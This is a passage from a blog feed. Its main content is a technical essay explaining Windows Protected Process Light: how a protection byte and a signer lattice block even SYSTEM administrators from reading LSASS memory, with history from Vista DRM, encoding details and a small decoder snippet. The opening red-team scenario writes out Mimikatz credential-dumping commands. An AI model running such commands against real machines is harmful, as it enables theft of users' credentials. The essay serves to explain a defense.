&amp;lt;/FAQItem&amp;gt;

&amp;lt;/FAQ&amp;gt;

&amp;lt;StudyGuide slug=&quot;measured-boot-tcg-event-log&quot; keyTerms={[
  { term: &quot;PCR (Platform Configuration Register)&quot;, definition: &quot;Append-only TPM register that extends rather than stores. Modern TPMs have 24 PCRs per hash bank; `PCR[N] := H(PCR[N] || measurement)`.&quot; },
  { term: &quot;CRTM (Core Root of Trust for Measurement)&quot;, definition: &quot;The smallest, lowest, immutable code that runs after platform reset. It measures the next firmware stage into PCR[0] and is an axiomatic root, not a verified one.&quot; },
  { term: &quot;SRTM (Static Root of Trust for Measurement)&quot;, definition: &quot;The measurement chain rooted at the CRTM, covering PCRs 0-7 and 11-14 across firmware, boot manager, OS loader, ELAM, and kernel.&quot; },
  { term: &quot;DRTM (Dynamic Root of Trust for Measurement)&quot;, definition: &quot;Mid-boot CPU primitive (Intel `GETSEC[SENTER]`, AMD `SKINIT`) that resets PCRs 17-22 and atomically launches a vendor-signed Authenticated Code Module plus a Measured Launch Environment.&quot; },
  { term: &quot;TCG Event Log / WBCL&quot;, definition: &quot;Ordered list of `TCG_PCR_EVENT2` records (with Microsoft-specific WBCL extensions in PCRs 11/12/13) that the verifier replays to re-derive PCR values from a `TPM2_Quote`.&quot; },
  { term: &quot;TPM2_PolicyPCR / TPM2_Unseal&quot;, definition: &quot;TPM 2.0 commands that bind a sealed blob&apos;s release to a specific PCR profile. BitLocker uses this pair to release the VMK only when current PCRs match the seal-time digest.&quot; },
  { term: &quot;Authenticode&quot;, definition: &quot;Microsoft PE-image digest format used for code signing. PCR[4] hashes the Authenticode digest of `bootmgfw.efi`, not the raw bytes of the file.&quot; },
  { term: &quot;Cuckoo Attack&quot;, definition: &quot;An attestation-relay attack (Parno 2008) in which a compromised device proxies a verifier&apos;s challenge to a different genuine TPM and returns that TPM&apos;s valid signed quote. Closeable only by pre-binding the AK to the device serial.&quot; },
]} /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</content:encoded><category>measured-boot</category><category>tcg-event-log</category><category>bitlocker</category><category>tpm</category><category>srtm</category><category>drtm</category><category>secure-launch</category><category>pcr</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Protected Process Light: When the Administrator Isn&apos;t Enough</title><link>https://paragmali.com/blog/protected-process-light-when-the-administrator-isnt-enough/</link><guid isPermaLink="true">https://paragmali.com/blog/protected-process-light-when-the-administrator-isnt-enough/</guid><description>How a single byte in EPROCESS encodes a signer lattice that denies SYSTEM-integrity admins the right to read LSASS -- and why every public bypass since 2018 attacks the same structural seam.</description><pubDate>Tue, 12 May 2026 00:00:00 GMT</pubDate><content:encoded>
**Windows Protected Process Light (PPL) re-asks the question of who can touch whom one level below the token model.** A single byte in `EPROCESS` packs a process&apos;s protection type, audit bit, and signer rung; the kernel&apos;s lattice check inside `NtOpenProcess` rejects memory-read attempts from below the target&apos;s rung even when the caller is SYSTEM with `SeDebugPrivilege` enabled. Every public bypass since 2018 lives in one structural class -- the kernel verifies the channel by which code enters a PPL, not the behaviour of that code once mapped -- which is why Microsoft classifies PPL as defense in depth rather than a security boundary, and why Credential Guard / `LsaIso.exe` is its necessary VBS-anchored companion.
&lt;h2&gt;1. Mimikatz on a Protected Box&lt;/h2&gt;
&lt;p&gt;A red team operator has done everything right. The shell is SYSTEM-integrity. &lt;code&gt;SeDebugPrivilege&lt;/code&gt; is enabled in the token. &lt;code&gt;whoami /priv&lt;/code&gt; shows every privilege Windows defines. The operator types &lt;code&gt;mimikatz.exe&lt;/code&gt;, then &lt;code&gt;privilege::debug&lt;/code&gt; -- &lt;em&gt;OK&lt;/em&gt;. Then &lt;code&gt;sekurlsa::logonpasswords&lt;/code&gt; -- and Mimikatz answers:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory : (0x00000005) Access is denied
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The mechanism that just denied them is not a privilege check at all. It is not an ACL decision. It is not the integrity-level mediator. itm4n recreated exactly this failure in 2021 against a vanilla Windows install with one registry value set [@itm4n-runasppl]. The error code &lt;code&gt;0x00000005&lt;/code&gt; is &lt;code&gt;ERROR_ACCESS_DENIED&lt;/code&gt; -- the Win32 surface that &lt;code&gt;GetLastError&lt;/code&gt; exposes for the kernel&apos;s NTSTATUS &lt;code&gt;STATUS_ACCESS_DENIED = 0xC0000022&lt;/code&gt;. The kernel returns the NTSTATUS out of &lt;code&gt;NtOpenProcess&lt;/code&gt; before the security descriptor of &lt;code&gt;lsass.exe&lt;/code&gt; has been consulted; &lt;code&gt;RtlNtStatusToDosError&lt;/code&gt; then maps it to the Win32 &lt;code&gt;0x5&lt;/code&gt; that surfaces in &lt;code&gt;kuhl_m_sekurlsa.c&lt;/code&gt;.&lt;/p&gt;

A kernel-enforced gating model that decorates a process with a *protection level* -- a structured byte combining a type field, an audit bit, and a signer rung -- and rejects `OpenProcess` requests from callers whose protection level is below the target&apos;s, regardless of token privileges or security-descriptor ACLs.
&lt;p&gt;Picture the scenario concretely. A 2026 red-team engagement against a hardened Windows 11 24H2 endpoint. &lt;code&gt;RunAsPPL&lt;/code&gt; audit-mode is on by default after the Windows 11 22H2 rollout extended audit-default to consumer SKUs [@learn-runasppl]. A third-party EDR daemon is already running, signed at the Antimalware rung via the vendor&apos;s Microsoft Virus Initiative enrollment. The operator owns local administrator. The operator has SYSTEM. The operator holds every privilege Windows defines. They still cannot read a single byte of LSASS memory.&lt;/p&gt;
&lt;p&gt;The denial trace, walked carefully, looks like this. Mimikatz calls &lt;code&gt;OpenProcess(PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, FALSE, lsass_pid)&lt;/code&gt;. The Win32 thunk lands on &lt;code&gt;NtOpenProcess&lt;/code&gt;, which dispatches to the object-manager callback &lt;code&gt;PspProcessOpen&lt;/code&gt;. That callback calls &lt;code&gt;PspCheckForInvalidAccessByProtection&lt;/code&gt;, which calls &lt;code&gt;RtlTestProtectedAccess&lt;/code&gt; against the caller&apos;s &lt;code&gt;EPROCESS.Protection&lt;/code&gt; byte and the target&apos;s &lt;code&gt;EPROCESS.Protection&lt;/code&gt; byte. The lattice test fails. Both &lt;code&gt;PROCESS_VM_READ&lt;/code&gt; and &lt;code&gt;PROCESS_QUERY_INFORMATION&lt;/code&gt; are full-access bits, outside the limited subset the lattice leaves intact for a &lt;code&gt;None&lt;/code&gt; caller against &lt;code&gt;PPL/Lsa&lt;/code&gt;, so the kernel strips both. Nothing Mimikatz asked for survives the pruning, and the open resolves to &lt;code&gt;STATUS_ACCESS_DENIED&lt;/code&gt;: exactly the path that produces &lt;code&gt;0x00000005&lt;/code&gt; in &lt;code&gt;kuhl_m_sekurlsa.c&lt;/code&gt;The relevant commit is &lt;code&gt;fe4e98405589e96ed6de5e05ce3c872f8108c0a0&lt;/code&gt;, cited by itm4n as the source for the exact failure path that yields &lt;code&gt;0x00000005&lt;/code&gt; [@mimikatz-sekurlsa]..&lt;/p&gt;

sequenceDiagram
    participant Mim as Mimikatz (SYSTEM, SeDebugPrivilege)
    participant K32 as kernel32 / OpenProcess
    participant NtOP as NtOpenProcess
    participant PsPO as PspProcessOpen
    participant CHK as PspCheckForInvalidAccessByProtection
    participant Lat as RtlTestProtectedAccess
    participant SAC as SeAccessCheck&lt;pre&gt;&lt;code&gt;Mim-&amp;gt;&amp;gt;K32: OpenProcess(PROCESS_VM_READ, lsass)
K32-&amp;gt;&amp;gt;NtOP: syscall NtOpenProcess
NtOP-&amp;gt;&amp;gt;PsPO: object-manager callback
PsPO-&amp;gt;&amp;gt;CHK: check caller.Protection vs target.Protection
CHK-&amp;gt;&amp;gt;Lat: lattice rule (signer rungs)
Lat--&amp;gt;&amp;gt;CHK: full mask denied
CHK--&amp;gt;&amp;gt;PsPO: strip PROCESS_VM_READ
PsPO-&amp;gt;&amp;gt;SAC: residual mask (limited only)
SAC--&amp;gt;&amp;gt;NtOP: limited handle (read denied)
NtOP--&amp;gt;&amp;gt;Mim: STATUS_ACCESS_DENIED (NTSTATUS 0xC0000022, Win32 GetLastError = 5)
&lt;/code&gt;&lt;/pre&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; If every privilege Windows defines is held by the caller, what is doing the denying? The answer is a kernel structure that the token model does not see and the security descriptor does not influence -- a byte in &lt;code&gt;EPROCESS&lt;/code&gt; named &lt;code&gt;Protection&lt;/code&gt;, mediating a lattice the access check consults &lt;em&gt;before&lt;/em&gt; it ever asks &lt;code&gt;SeAccessCheck&lt;/code&gt; about privileges.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This is not a workaround pattern. It is a new dimension. The token model is unchanged. The integrity level is unchanged. The security descriptor on &lt;code&gt;lsass.exe&lt;/code&gt; is unchanged. What changed is that the kernel now answers a question it did not ask before: &lt;em&gt;what kind of trust does the caller have to manipulate the address space of the callee?&lt;/em&gt;&lt;/p&gt;

PPL re-asks the question of who can touch whom one level below the token model.
&lt;p&gt;That mechanism has a name (Protected Process Light), an encoding (a single &lt;code&gt;UCHAR&lt;/code&gt;), and a history that does not begin where you would expect. To understand the byte, we have to understand why Microsoft built it in the first place. The next section starts where the history starts: a 2006 Microsoft whitepaper about Hollywood.&lt;/p&gt;
&lt;h2&gt;2. Historical Origins -- Vista, DRM, and the First Protected Process&lt;/h2&gt;
&lt;p&gt;The kernel mechanism that today denies admins access to LSASS was invented in 2006 to keep Hollywood happy. The cover page of Microsoft&apos;s &lt;code&gt;process_vista.doc&lt;/code&gt; whitepaper opens with a sentence almost no one quotes today:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The Microsoft Windows Vista operating system introduces a new type of process known as a protected process to enhance support for Digital Rights Management functionality in Windows Vista.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The whitepaper was published November 27, 2006, two months before Vista&apos;s GA, and it is the architectural seed of the byte we will be staring at for the rest of this article [@vista-process-doc]. The motivation was not credential theft. It was HD-DVD and Blu-ray content protection. Studio licensing agreements required that even an administrator on the local machine could not read the audio device graph isolation host&apos;s memory while protected content was playing. The Protected Media Path required a kernel-enforced barrier between admin user-mode and the media pipeline.&lt;/p&gt;

The Vista-era set of components that decrypt and render high-definition video and audio content under DRM. PMP requires kernel-enforced isolation of `audiodg.exe` and a small set of related processes so that local administrators cannot dump intermediate content keys from process memory.
&lt;p&gt;The Vista design was minimal. A single bit in &lt;code&gt;EPROCESS&lt;/code&gt; marks a process as protected. At &lt;code&gt;NtCreateUserProcess&lt;/code&gt;, the kernel parses the main image&apos;s Authenticode signature and looks for a specific Microsoft EKU OID that only the PMP signing root can issue [@forshaw-2018-10]. If the EKU is present and the chain resolves to that root, the kernel flips the bit. On every subsequent &lt;code&gt;NtOpenProcess&lt;/code&gt; against that process, the kernel strips a fixed set of access rights from the mask, no matter who is asking.&lt;/p&gt;
&lt;p&gt;Alex Ionescu, then a Windows internals researcher and now CrowdStrike&apos;s Chief Technology Innovation Officer, enumerated the denials in 2007 [@ionescu-pp-bad-idea]:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;A typical process cannot perform operations such as the following on a protected process: Inject a thread into a protected process; Access the virtual memory of a protected process; Debug an active protected process; Duplicate a handle from a protected process; Change the quota or working set of a protected process.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Five denials. One bit. One certificate root. Ionescu&apos;s same essay, titled &quot;Why Protected Processes Are A Bad Idea,&quot; made a structural argument that aged well: putting a DRM mechanism in the kernel is a category error. The mechanism is too narrow for non-DRM use because the only certificate accepted is Microsoft&apos;s PMP signing root, and the only operations gated are the ones Hollywood cared about. Third parties cannot opt in, and Microsoft itself cannot graduate the level of trust.Ionescu&apos;s 2007 critique remains worth reading on its own merits. The argument that DRM-shaped kernel features tend to be reused for security mitigations and that this reuse changes their threat-model semantics is exactly what plays out over the next seven years [@ionescu-pp-bad-idea].&lt;/p&gt;
&lt;p&gt;The seven-year pause is its own story. Vista shipped, Vista was followed by Windows 7, and Windows 7 was followed by Windows 8 -- and through all of it, the access-check primitive that protects &lt;code&gt;audiodg.exe&lt;/code&gt; from administrators remained a DRM artefact. The primitive existed; the &lt;em&gt;graduated trust dimension&lt;/em&gt; did not. Two parallel failures pushed Microsoft toward widening the encoding.&lt;/p&gt;
&lt;p&gt;The first was Mimikatz. Benjamin Delpy&apos;s tool was first released in May 2011 and refined through 2013 [@mimikatz-wikipedia]; it made it trivial for an administrator to extract NTLM hashes and Kerberos session keys from &lt;code&gt;lsass.exe&lt;/code&gt;. The countermeasure of restricting &lt;code&gt;SeDebugPrivilege&lt;/code&gt; was useless; an attacker who has SYSTEM has every privilege. What Mimikatz exploited was a primitive gap: the kernel had no way to say &quot;lsass is protected against administrators but reachable from privileged Microsoft services.&quot;&lt;/p&gt;
&lt;p&gt;The second was the CSRSS-gating weakness that Mateusz Jurczyk exposed in 2013. Jurczyk (who writes as &lt;code&gt;j00ru&lt;/code&gt;) catalogued more than seventy Win32k system calls that the kernel guarded with the pattern &lt;code&gt;if (PsGetCurrentProcess() != gpepCsrss) return STATUS_ACCESS_DENIED;&lt;/code&gt; [@j00ru-1393]. That gating mechanism worked only as long as nobody could inject code into &lt;code&gt;csrss.exe&lt;/code&gt;. On Windows 8 RT, an attacker who could inject into &lt;code&gt;csrss.exe&lt;/code&gt; could bypass Microsoft&apos;s locked-down Surface RT shell. Ionescu later observed that &quot;In Windows 8.1 RT, this jailbreak is &apos;fixed&apos;, by virtue that code can no longer be injected into Csrss.exe for the attack&quot; [@ionescu-part2]. The fix made &lt;code&gt;csrss.exe&lt;/code&gt; a PPL at the &lt;code&gt;WinTcb&lt;/code&gt; rung, and the same machinery was generalised to &lt;code&gt;lsass.exe&lt;/code&gt; and the Antimalware tier.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Mimikatz proved Microsoft needed a graduated trust dimension for &lt;code&gt;lsass.exe&lt;/code&gt;. The j00ru CSRSS jailbreak proved Microsoft needed it for &lt;code&gt;csrss.exe&lt;/code&gt; too. The same widening of the encoding answered both.&lt;/p&gt;
&lt;/blockquote&gt;

flowchart LR
    subgraph Vista2006[Vista 2006 -- single bit]
        V1[EPROCESS protected = 0 or 1]
        V2[Certificate root: PMP only]
        V3[Access denials: hardcoded 5-tuple]
    end
    subgraph Win81[Windows 8.1 -- _PS_PROTECTION byte]
        W1[Type: 3 bits]
        W2[Audit: 1 bit]
        W3[Signer rung: 4 bits]
        W4[Certificate roots: per-EKU sub-OIDs]
        W5[Access denials: lattice over signer]
    end
    V1 --&amp;gt; W1
    V2 --&amp;gt; W4
    V3 --&amp;gt; W5

The DRM-to-credentials repurposing is not unique to PPL. The same pattern shows up in HVCI (originally a Hyper-V kernel-mode integrity feature, later repurposed for general code-integrity enforcement) and in Trustlets (originally an enterprise feature for Credential Guard, later generalised). Kernel mechanisms born in one threat model rarely stay confined to it.
&lt;p&gt;Microsoft already had the access-check primitive. What it didn&apos;t have, in 2007, was a way to ask &quot;how much trust does this process carry?&quot; The fix would not arrive until Windows 8.1 in October 2013, and when it arrived, it would fit in a single byte.&lt;/p&gt;
&lt;h2&gt;3. &lt;code&gt;_PS_PROTECTION&lt;/code&gt; -- The Single-Byte Encoding&lt;/h2&gt;
&lt;p&gt;The 8.1 fix is so compact it fits in a single byte. Ionescu&apos;s Part 1 of the &quot;Evolution of Protected Processes&quot; series, published November 22, 2013, gives the kernel structure verbatim [@ionescu-part1]:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-c&quot;&gt;typedef struct _PS_PROTECTION {
    union {
        UCHAR Level;
        struct {
            UCHAR Type   : 3;
            UCHAR Audit  : 1;
            UCHAR Signer : 4;
        };
    };
} PS_PROTECTION, *PPS_PROTECTION;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Three fields. One byte. The union with &lt;code&gt;Level:UCHAR&lt;/code&gt; exists so that two &lt;code&gt;_PS_PROTECTION&lt;/code&gt; values can be compared with a single byte load and a single byte compare. The kernel does this on every &lt;code&gt;NtOpenProcess&lt;/code&gt;. Speed matters; this is the hot path of the security model.&lt;/p&gt;

The kernel structure that encodes a process&apos;s protection state in eight bits: three bits of Type (`None`, `ProtectedLight`, `Protected`), one bit of Audit (intended as a forensic side-channel hint, although the exact runtime semantics are not enumerated in the public sources cited here), and four bits of Signer rung. Stored as `EPROCESS.Protection`.
&lt;p&gt;The Type field has three values. &lt;code&gt;PsProtectedTypeNone = 0&lt;/code&gt; marks a regular process. &lt;code&gt;PsProtectedTypeProtectedLight = 1&lt;/code&gt; marks a PPL -- the graduated path introduced in 8.1. &lt;code&gt;PsProtectedTypeProtected = 2&lt;/code&gt; marks a &quot;heavy&quot; Vista-style PP. Heavy PPs still exist; they retain the original DRM semantics where almost nothing from below the protection level may touch them. PPLs are the new general-purpose path where the &lt;em&gt;signer rung&lt;/em&gt; mediates a graduated lattice.&lt;/p&gt;
&lt;p&gt;The Audit bit is the least documented of the three fields. Ionescu Part 1 lists it as &lt;code&gt;Audit : Pos 3, 1 Bit&lt;/code&gt; with no semantic gloss; itm4n&apos;s RunAsPPL header annotates it as &lt;code&gt;// Reserved&lt;/code&gt;; Microsoft Learn enumerates CodeIntegrity events &lt;code&gt;3033&lt;/code&gt;, &lt;code&gt;3063&lt;/code&gt;, &lt;code&gt;3065&lt;/code&gt;, and &lt;code&gt;3066&lt;/code&gt;, but those are triggered by the &lt;code&gt;AuditLevel&lt;/code&gt; configuration under &lt;code&gt;Image File Execution Options\LSASS.exe&lt;/code&gt; and concern DLL-load failures, not per-process &lt;code&gt;OpenProcess&lt;/code&gt; denials [@ionescu-part1] [@itm4n-runasppl] [@learn-runasppl]. The field&apos;s name implies a forensic side-channel, and the bit-position is reserved; the precise runtime emission shape is not enumerated in the public sources cited here.&lt;/p&gt;
&lt;p&gt;The Signer field is the structurally interesting one. Ionescu&apos;s 2013 enumeration names eight values [@ionescu-part1]:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Signer constant&lt;/th&gt;
&lt;th&gt;Value&lt;/th&gt;
&lt;th&gt;Used for&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;&lt;code&gt;PsProtectedSignerNone&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;td&gt;Non-protected (no rung)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;PsProtectedSignerAuthenticode&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Generic third-party Authenticode (early PPL guests)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;PsProtectedSignerCodeGen&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;.NET native runtime code generators&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;PsProtectedSignerAntimalware&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;EDR / AV daemons admitted via ELAM&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;PsProtectedSignerLsa&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;&lt;code&gt;lsass.exe&lt;/code&gt; under &lt;code&gt;RunAsPPL&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;PsProtectedSignerWindows&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Microsoft Windows components below TCB&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;PsProtectedSignerWinTcb&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;&lt;code&gt;csrss.exe&lt;/code&gt;, &lt;code&gt;smss.exe&lt;/code&gt;, &lt;code&gt;services.exe&lt;/code&gt; -- the inbox TCB&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;PsProtectedSignerMax&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;Sentinel value (enumeration upper bound)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Ionescu&apos;s 2013 list is the authoritative &lt;em&gt;baseline&lt;/em&gt; enumeration. It is not a permanent enumeration. By 2018, James Forshaw&apos;s PowerShell tooling (&lt;code&gt;NtApiDotNet&lt;/code&gt;) was enumerating an additional &lt;code&gt;App = 8&lt;/code&gt; signer used for AppContainer / TruePlay scenarios [@forshaw-2018-10]. Newer builds of Windows extend the enumeration further. The article will name &lt;code&gt;WinTcb&lt;/code&gt; (Microsoft&apos;s documented inbox-TCB rung) and &lt;code&gt;Antimalware&lt;/code&gt; (the only non-Microsoft-admissible rung) repeatedly, because they are the load-bearing ones. The intermediate values evolve.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Adjacent to &lt;code&gt;EPROCESS.Protection&lt;/code&gt; are two related fields, &lt;code&gt;EPROCESS.SignatureLevel&lt;/code&gt; and &lt;code&gt;EPROCESS.SectionSignatureLevel&lt;/code&gt;, which Ionescu introduces in Part 3 [@ionescu-part3]. These fields encode the &lt;em&gt;binary integrity&lt;/em&gt; the kernel demands at process creation and at every subsequent section load, and they are filled in from a 16-entry Signing Level table that runs from &lt;code&gt;Unchecked = 0&lt;/code&gt; up to &lt;code&gt;Windows TCB = 14&lt;/code&gt;. The Signer rung in &lt;code&gt;Protection&lt;/code&gt; answers &quot;what kind of trust does this process hold?&quot; The SignatureLevel pair answers &quot;what binaries is this process allowed to map?&quot; They are not the same question.&lt;/p&gt;
&lt;p&gt;Now the worked decode. Given the byte value &lt;code&gt;0x41&lt;/code&gt;, the encoding falls out by hand:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Low three bits (Type): &lt;code&gt;0x41 &amp;amp; 0x07 = 0x01&lt;/code&gt; -- &lt;code&gt;PsProtectedTypeProtectedLight&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Bit 3 (Audit): &lt;code&gt;(0x41 &amp;gt;&amp;gt; 3) &amp;amp; 0x01 = 0&lt;/code&gt; -- Audit off.&lt;/li&gt;
&lt;li&gt;High four bits (Signer): &lt;code&gt;(0x41 &amp;gt;&amp;gt; 4) &amp;amp; 0x0F = 0x04&lt;/code&gt; -- &lt;code&gt;PsProtectedSignerLsa&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A process with &lt;code&gt;EPROCESS.Protection = 0x41&lt;/code&gt; is a PPL signed at the &lt;code&gt;Lsa&lt;/code&gt; rung. That is exactly what &lt;code&gt;lsass.exe&lt;/code&gt; looks like on a host with &lt;code&gt;RunAsPPL = 1&lt;/code&gt;. Ionescu&apos;s blog explicitly states: &quot;it&apos;s easy to read 0x41 as Lsa (0x4) + PPL (0x1)&quot; [@ionescu-part1]. The Defender service &lt;code&gt;MsMpEng.exe&lt;/code&gt;, signed at the Antimalware rung, has &lt;code&gt;Protection = 0x31&lt;/code&gt;. The session manager &lt;code&gt;csrss.exe&lt;/code&gt;, signed at WinTcb, has &lt;code&gt;Protection = 0x61&lt;/code&gt;.&lt;/p&gt;

flowchart TD
    B[byte: 8 bits]
    B --&amp;gt; F1[bits 0..2: Type]
    B --&amp;gt; F2[bit 3: Audit]
    B --&amp;gt; F3[bits 4..7: Signer]
    F1 --&amp;gt; T0[0 = None]
    F1 --&amp;gt; T1[1 = ProtectedLight PPL]
    F1 --&amp;gt; T2[2 = Protected PP]
    F3 --&amp;gt; S0[0 None]
    F3 --&amp;gt; S1[1 Authenticode]
    F3 --&amp;gt; S2[2 CodeGen]
    F3 --&amp;gt; S3[3 Antimalware]
    F3 --&amp;gt; S4[4 Lsa]
    F3 --&amp;gt; S5[5 Windows]
    F3 --&amp;gt; S6[6 WinTcb]
&lt;p&gt;{`
function decodeProtection(byteValue) {
  const type = byteValue &amp;amp; 0x07;
  const audit = (byteValue &amp;gt;&amp;gt; 3) &amp;amp; 0x01;
  const signer = (byteValue &amp;gt;&amp;gt; 4) &amp;amp; 0x0F;
  const typeNames = [&apos;None&apos;, &apos;ProtectedLight&apos;, &apos;Protected&apos;];
  const signerNames = [
    &apos;None&apos;, &apos;Authenticode&apos;, &apos;CodeGen&apos;, &apos;Antimalware&apos;,
    &apos;Lsa&apos;, &apos;Windows&apos;, &apos;WinTcb&apos;, &apos;Max&apos;
  ];
  return {
    raw: &apos;0x&apos; + byteValue.toString(16).padStart(2, &apos;0&apos;),
    type: typeNames[type] || &apos;unknown(&apos; + type + &apos;)&apos;,
    audit: audit ? &apos;on&apos; : &apos;off&apos;,
    signer: signerNames[signer] || &apos;unknown(&apos; + signer + &apos;)&apos;
  };
}&lt;/p&gt;
&lt;p&gt;// Worked examples from real Windows processes
console.log(&apos;MsMpEng.exe (Defender):&apos;, decodeProtection(0x31));
console.log(&apos;lsass.exe under RunAsPPL:&apos;, decodeProtection(0x41));
console.log(&apos;csrss.exe (WinTcb):&apos;, decodeProtection(0x61));
`}&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; One byte, three fields, eight signer rungs. The kernel reads it on every &lt;code&gt;OpenProcess&lt;/code&gt;, before any token check, before any ACL evaluation. The encoding is the entire vocabulary the kernel has for asking &lt;em&gt;how trusted&lt;/em&gt; a process is.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The encoding tells the kernel &lt;em&gt;what kind&lt;/em&gt; of trust a process holds. It says nothing about &lt;em&gt;who can touch whom&lt;/em&gt; across rungs. That rule -- the lattice -- is the structure imposed on top of the bytes. The next section is the lattice.&lt;/p&gt;
&lt;h2&gt;4. The Signer Lattice -- Who Can Open Whom&lt;/h2&gt;
&lt;p&gt;itm4n&apos;s 2021 walkthrough states the three rules verbatim, and they have the rare quality of being short enough to memorise [@itm4n-scrt]:&lt;/p&gt;

A PP can open a PP or a PPL with full access if its signer type is greater or equal. A PPL can open a PPL with full access if its signer type is greater or equal. A PPL cannot open a PP with full access, regardless of its signer type.
&lt;p&gt;Three rules. They settle every cross-process access question PPL gates. Let us name them and then read off their consequences.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Rule 1.&lt;/strong&gt; A PP at signer $S_c$ may open with full access a PP or PPL at signer $S_t$ if and only if $S_c \ge S_t$.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Rule 2.&lt;/strong&gt; A PPL at signer $S_c$ may open with full access a PPL at signer $S_t$ if and only if $S_c \ge S_t$.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Rule 3.&lt;/strong&gt; A PPL cannot open a PP with full access, regardless of signer.&lt;/p&gt;
&lt;p&gt;The qualifier &quot;with full access&quot; is load-bearing. PPL&apos;s lattice gates the &lt;em&gt;full&lt;/em&gt; mask -- &lt;code&gt;PROCESS_VM_READ&lt;/code&gt;, &lt;code&gt;PROCESS_VM_WRITE&lt;/code&gt;, &lt;code&gt;PROCESS_CREATE_THREAD&lt;/code&gt;, &lt;code&gt;PROCESS_DUP_HANDLE&lt;/code&gt;, &lt;code&gt;PROCESS_ALL_ACCESS&lt;/code&gt;. A separate &lt;em&gt;limited&lt;/em&gt; mask (&lt;code&gt;SYNCHRONIZE&lt;/code&gt;, &lt;code&gt;PROCESS_QUERY_LIMITED_INFORMATION&lt;/code&gt;, &lt;code&gt;PROCESS_SET_LIMITED_INFORMATION&lt;/code&gt;, &lt;code&gt;PROCESS_SUSPEND_RESUME&lt;/code&gt;, and -- for callers below the &lt;code&gt;Authenticode&lt;/code&gt;/&lt;code&gt;CodeGen&lt;/code&gt;/&lt;code&gt;Windows&lt;/code&gt; tier -- &lt;code&gt;PROCESS_TERMINATE&lt;/code&gt;) is allowed when the security descriptor permits. The tier matters. Ionescu&apos;s verbatim &lt;code&gt;RtlProtectedAccess[]&lt;/code&gt; table widens the deny mask from &lt;code&gt;0xFC7FE&lt;/code&gt; to &lt;code&gt;0xFC7FF&lt;/code&gt; at the &lt;code&gt;Antimalware&lt;/code&gt;, &lt;code&gt;Lsa&lt;/code&gt;, and &lt;code&gt;WinTcb&lt;/code&gt; rungs -- one extra bit, bit 0, which is &lt;code&gt;PROCESS_TERMINATE&lt;/code&gt; [@ionescu-part2]. So an administrator can still call &lt;code&gt;OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, ...)&lt;/code&gt; against a protected &lt;code&gt;lsass.exe&lt;/code&gt; to enumerate threads, but cannot terminate a &lt;code&gt;PPL/Antimalware&lt;/code&gt;, &lt;code&gt;PPL/Lsa&lt;/code&gt;, or &lt;code&gt;PPL/WinTcb&lt;/code&gt; daemon via a direct kill. The lattice does not lock the process; it locks the &lt;em&gt;interesting&lt;/em&gt; access, and for the top-tier rungs it also locks the kill.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Caller signer \ Target signer&lt;/th&gt;
&lt;th&gt;None&lt;/th&gt;
&lt;th&gt;Authenticode (1)&lt;/th&gt;
&lt;th&gt;Antimalware (3)&lt;/th&gt;
&lt;th&gt;Lsa (4)&lt;/th&gt;
&lt;th&gt;Windows (5)&lt;/th&gt;
